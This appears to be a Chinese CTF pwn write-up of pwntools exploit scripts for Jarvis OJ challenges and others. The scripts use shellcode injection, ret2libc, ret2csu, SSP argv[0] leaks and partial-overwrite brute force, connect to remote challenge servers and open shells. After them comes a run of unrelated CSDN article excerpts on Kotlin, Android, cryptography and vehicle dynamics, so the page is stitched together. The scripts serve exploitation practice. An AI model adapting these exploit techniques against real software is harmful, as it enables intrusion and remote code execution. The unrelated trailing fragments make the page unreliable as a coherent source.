#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="i386", log_level="debug")
content = 1
def main():
if content == 0:
io = process("./level1.80eacdcd51aca92af7749d96efad7fb5")
else:
io = remote("pwn2.jarvisoj.com",9877)
sh=io.recvuntil("\n")[14:-2]
print(sh)
shell_addr=int(sh.decode(),16)
payload =asm(shellcraft.sh())
payload+=(0x88+4-len(payload))*b'a'
payload+=p32(shell_addr)
io.sendline(payload)
io.interactive()
main()
重新做这个题弄懂了接收地址时以及p32,p64,p16的一些细节
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="i386", log_level="debug")
content = 1
#elf
elf=ELF("level3")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x8048484
#libc
libc=ELF("libc-2.19.so")
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))
def main():
if content == 0:
io = process("./level3")
else:
io = remote("pwn2.jarvisoj.com",9879)
payload =b'a'*(0x88+4)
payload+=p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(8)
#leak
io.sendlineafter("Input:\n",payload)
#addr=io.recvline()[:-7]
addr=io.recv(8)
#addr=io.recv(4)
print(addr)
#addr=addr.ljust(8,b'\x00')
print(addr)
#write_addr=u32(addr)
write_addr=u64(addr)
print(write_addr)
#count
libcbase=write_addr-write_libc
sys_addr=libcbase+sys_libc
binsh_addr=libcbase+binsh_libc
#getshell
payload=b'a'*(0x88+4)+p32(sys_addr)+b'aaaa'+p32(binsh_addr)
io.sendline(payload)
io.interactive()
main()
x64位程序调用函数一般应该使用万能gadget(ret2csu)控制参数
这个题ROPgadget中只能控制rdi和rsi,无法控制rdx,但由于调用read函数时rdx被置于0x200h,并且没有改变,rdx大于8,因此能够leak出我们所需地址,因此可以不用csu解题
这里练习一下ret2csu,
#!/usr/bin/env python3
from pwn import *
#rdi rsi rdx(0x200h) libc
#wn_gadget
context(os="linux", arch="amd64", log_level="debug")
content = 1
#elf
elf=ELF("level3_x64")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x40061A
pop6_addr=0x4006AA
mov3_addr=0x400690
pop_rdi=0x4006b3
#libc
libc=ELF("libc-2.19.so")
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))
def csu(r12,r13,r14,r15,ret):
payload =b'a'*(0x80+8)
payload+=p64(pop6_addr)+p64(0)+p64(1)
payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
payload+=p64(mov3_addr)
payload+=b'a'*(56)
payload+=p64(ret)
io.sendline(payload)
sleep(1)
def main():
global io
if content == 0:
io = process("./level3_x64")
else:
io = remote("pwn2.jarvisoj.com",9883)
#leak
io.recvuntil("Input:\n")
csu(write_got,8,write_got,1,main_addr)
addr=io.recv(8)
print(addr)
write_addr=u64(addr)
print(write_addr)
#count
libcbase=write_addr-write_libc
sys_addr=libcbase+sys_libc
binsh_addr=libcbase+binsh_libc
#getshell
io.recvuntil("Input:\n")
payload=b'a'*(0x80+8)+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
io.sendline(payload)
io.interactive()
main()
canary:ssp攻击(故意触发___stack_chk_fail,覆盖argv[0],输出已知地址字符串)
flag地址被重映射到了别的地方,可以用pwndbg search 字符串
命令或peda find 字符串
命令,找到重映射的地址
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
content = 1
def main():
if content == 0:
io = process("./smashes.44838f6edd4408a53feb2e2bbfe5b229")
else:
io = remote("pwn.jarvisoj.com",9877)
payload =p64(0x0400d20)*0x200
io.recvuntil("Hello!\nWhat's your name? ")
io.sendline(payload)
io.interactive()
main()
和smashes一个知识点
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
content = 1
def main():
if content == 0:
io = process("./easystack")
else:
io = remote("node2.hackingfor.fun",35241)
payload = p64(0x6cde20)*100
io.sendline(payload)
io.interactive()
main()
知识点:
1.malloc开了0x18空间,而栈只有0x10空间
2.地址随机化,低位覆盖
#!/usr/bin/env python3
from pwn import *
context(log_level="debug")
while 1:
p = remote('node2.hackingfor.fun',32045)
p.send(b'a'*(0x10)+p8(0xe1)) # p16(0x4e1),由于pie地址随机化,只需覆盖地位地址
res = p.recvall()
if b"Nep{" in res:
break
print (res)
文章浏览阅读638次。fun unZip(zipFile: String, context: Context) { var outputStream: OutputStream? = null var inputStream: InputStream? = null try { val zf = ZipFile(zipFile) val entries = zf.entries() while (en..._kotlin 对上传的压缩包进行分析
文章浏览阅读1.9k次。随着业务逻辑越来越多,业务模块也越来越大,不可避免会遇到64K方法数的限制。最直观的表现就是编译报错:较早版本的编译系统中,错误内容如下:Conversion to Dalvik format failed:Unable to execute dex: method ID not in [0, 0xffff]: 65536较新版本的编译系统中,错误内容如下:trouble writing outp_java函数大于64k编译失败
文章浏览阅读2k次,点赞7次,收藏10次。物联网领域,有很多数据通信场景,因为原设备整体系统结构、运行环境等方面的限制,需求在不增加通信数据线缆的情况下实现数据的远程传输,因为特殊应用场景下考虑到环境的限制,还不能使用常规的无线通信手段,所以借助电源线缆进行传输的电力线载波技术应运而生,本次博文给大家分享的就是博主完全自主研发的低压电力线载波通信模组。_电力载波模块csdn
文章浏览阅读7.4k次。密码学基本概念 密码学(Cryptology)是结合数学、计算机科学、电子与通信等学科于一体的交叉学科,研究信息系统安全的科学。起源于保密通信技术。具体来讲,研究信息系统安全保密和认证的一门科学。 密码编码学,通过变换消息(对信息编码)使其保密的科学和艺术 密码分析学,在未知密钥的情况下从密文推_密码体制的五个要素
文章浏览阅读1.9k次。1 、据说python3就没有这个问题了2 、u'字符串' 代表是unicode格式的数据,路径最好写成这个格式,别直接跟字符串'字符串'这类数据相加,相加之后type就是str,这样就会存在解码失误的问题。别直接跟字符串'字符串'这类数据相加别直接跟字符串'字符串'这类数据相加别直接跟字符串'字符串'这类数据相加unicode类型别直接跟字符串'字符串'这类数据相加说四遍3 、有些读取的方式偏偏..._python 路径 中文
文章浏览阅读107次。最近,阿云 B 站没声音,是在憋大招!8月5日周四 19:00 是阿里云的直播首秀,给大家请来了 Forrester 评分世界第一的 Serverless 团队产品经理江昱,给大家在线...._阿里云直播b站
文章浏览阅读1.1k次。我好苦啊,半夜还在打代码。还出bug,狗日的。问题是这样的:我在新建的项目里,建了两个Module: fiora-ec和fiora-core。项目的依赖顺序是这样的,App依赖fiora-ec,fiora-ec又依赖于fiora-core,因为这种依赖关系,所有可以在app和fiora-ec中删除一些不必要的引入,比如这个玩意儿:com.android.support:appcompat-v7:..._为什么as在一个包下建了多个module,缺无法打开了
文章浏览阅读1.4k次。1. SMTP 插件 URL:http://www.magentocommerce.com/magento-connect/TurboSMTP/extension/4415/aschroder_turbosmtp KEY:magento-community/Aschroder_TurboSmtp 2. Email Template Adapter..._magento extension pour ricardo.ch
文章浏览阅读161次。声明:本文为原创作品,版权归akuei2及黑金动力社区共同所有,如需转载,请注明出处http://www.cnblogs.com/kingst/ 2.5 低级建模的资源 低级建模有讲求资源的分配,目的是使用“图形”来提高建模的解读性。 图上是低级建模最基本的建模框图,估计大家在实验一和实验二已经眼熟过。功能模块(低级功能模块)是一个水平的长方形,而控制模块(低级控制模块)是矩形。组..._cyclone ep2c8q208c黑金开发板
文章浏览阅读2.2w次,点赞10次,收藏63次。在日常生活和实际应用当中,我们经常会用到统计方面的知识,比如求最大值,求平均值等等。R语言是一门统计学语言,他可以方便的完成统计相关的计算,下面我们就来看一个相关案例。1. 背景最近西安交大大数据专业二班,开设了Java和大数据技术课程,班级人数共100人。2. 需求通过R语言完成该100位同学学号的生成,同时使用R语言模拟生成Java和大数据技术成绩,成绩满分为100,需要满足正_r语言案例分析
文章浏览阅读639次,点赞11次,收藏26次。虽然我个人也经常自嘲,十年之后要去成为外卖专员,但实际上依靠自身的努力,是能够减少三十五岁之后的焦虑的,毕竟好的架构师并不多。架构师,是我们大部分技术人的职业目标,一名好的架构师来源于机遇(公司)、个人努力(吃得苦、肯钻研)、天分(真的热爱)的三者协作的结果,实践+机遇+努力才能助你成为优秀的架构师。如果你也想成为一名好的架构师,那或许这份Java成长笔记你需要阅读阅读,希望能够对你的职业发展有所帮助。一个人可以走的很快,但一群人才能走的更远。
文章浏览阅读3.9k次,点赞9次,收藏53次。受力分析直线行驶时的车轮受力如下:水平方向上,所受合力为:F=Ft+Fw+FfF=F_t+F_w+F_fF=Ft+Fw+Ff其中,FtF_tFt为牵引力,FwF_wFw为空气阻力,FfF_fFf为滚动阻力,下面我们将逐个介绍。驱动力先来说扭矩,扭矩是使物体发生旋转的一个特殊力矩,等于力和力臂的乘积,单位为N∙mN∙mN∙m:设驱动轴的扭矩为TtT_tTt,车轮半径为rrr,那么牵引力:Ft=Tt⁄rF_t=T_t⁄rFt=Tt⁄r如何求得驱动轴扭矩TtT_tTt呢?_unity 车辆动力学模型